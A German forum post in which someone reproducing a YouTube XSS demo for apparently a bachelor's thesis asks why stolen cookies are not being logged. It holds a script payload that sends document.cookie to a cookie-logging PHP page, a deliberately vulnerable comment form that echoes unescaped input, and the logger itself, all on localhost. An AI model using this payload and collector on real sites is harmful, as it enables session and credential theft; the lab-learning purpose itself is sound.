hi,
in diesem video:
https://www.youtube.com/watch?v=OVLz6RgOjIY
wird ein simpler xss angriff gezeigt, nach abtippen des codes funktioniert zwar das eintragen eines normalen kommentars, jedoch nicht das eintragen von:
<script type="text/javascript">
window.location = 'http://localhost/bachelorarbeit/cookies.php?cookies='+document.cookie;
<script>
das eingabefeld für weitere kommentare verschwindet aber die cookies werden nicht auf dem server gespeichert :(+
die eingabe möglichkeit über das post comment field verschwindet weil document.location auf eine andere seite weiterleitet oder?
index.php : dieser teil funktioniert solange man kein <script>... verwendet:
<!DOCTYPE html>
<meta charset="UTF-8">
<title> Comment (XSS)</title>
</head>
<body>
<?php
setcookie("username", "admin", time()+3600);
setcookie("password", "xss", time()+3600);
if($_POST['content']!=null) {
$fp = fopen('comments.txt', 'a');
fwrite($fp, $_POST['content'] . "<hr/>");
fclose($fp);
}
echo nl2br(file_get_contents('comments.txt'));
?>
<h3>Post Comment</h3>
<form action="index.php" method="post">
<textarea name="content" rows="3" color="100"></textarea>
<br/>
<input type="submit" value="Post" />
</form>
</body>
</html>cookies.php : dieser teil schreibt nicht den inhalt der cookies wie erwartet in die datei cookies.txt
diese sollte am gleichen ort wie die index.php erscheinen?
<?php
$fp = fopen('cookies.txt', 'a');
fwrite($fp, $_GET['cookies'] . "\n\n");
fclose($fp);
?>